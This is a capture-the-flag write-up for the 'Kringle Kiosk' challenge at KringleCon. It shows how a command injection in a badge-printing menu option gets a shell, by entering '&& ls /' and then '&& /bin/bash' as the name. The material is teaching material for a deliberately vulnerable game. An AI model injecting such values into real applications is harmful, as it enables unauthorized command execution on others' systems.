#![](../images/cranpi.png) Kringle Kiosk

Shinny Upatree:
> Hiya hiya - I'm Shinny Upatree!

> Check out this cool KringleCon kiosk!

> You can get a map of the castle, learn about where the elves are, and get your own badge printed right on-screen!

> Be careful with that last one though. I heard someone say it's "ingestible." Or something...

> Do you think you could check and see if there _is_ an issue?

**TL;DR - [Answer](#answer)**

## Location
Lower-right corner of the Front Lawn ([see map](../map.md#ground-floor))

## Hints

> There's probably some kind of [command injection](https://owasp.org/www-community/attacks/Command_Injection) vulnerability in the menu terminal.

## Solution

When we connect to the terminal we are met with the MOTD:
```code
Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?

Escape the menu by launching /bin/bash


Press enter to continue...
```

Since the hint suggests we are looking for a command injection vulnerability, let's explore the places in the application that process user input. There are only 2.

* Main menu
* Option 4: Print Name Badge

If we enter anything other than 1-5 in the menu, we get an error so this is probably not the location of the vulnerabilty. Let's see what happens if we enter `&& ls /` as the name for option 4
```console
 _______________________
< Santa's Little Helper >
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
boot  etc  lib   media  opt  root  sbin  sys  usr
```
rutroh... The output shows the directory listing for the root directory. This means the server is likely running a command like `echo $name`. Let's use this command injection vulnerability to execute `&& /bin/bash`
```console
 _______________________
< Santa's Little Helper >
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||

   ___                                                      _    
  / __|   _  _     __      __      ___     ___     ___     | |   
  \__ \  | +| |   / _|    / _|    / -_)   (_-<    (_-<     |_|   
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
```


## Answer
Enter Option 4 on the menu, then enter your name as **`&& /bin/bash`**
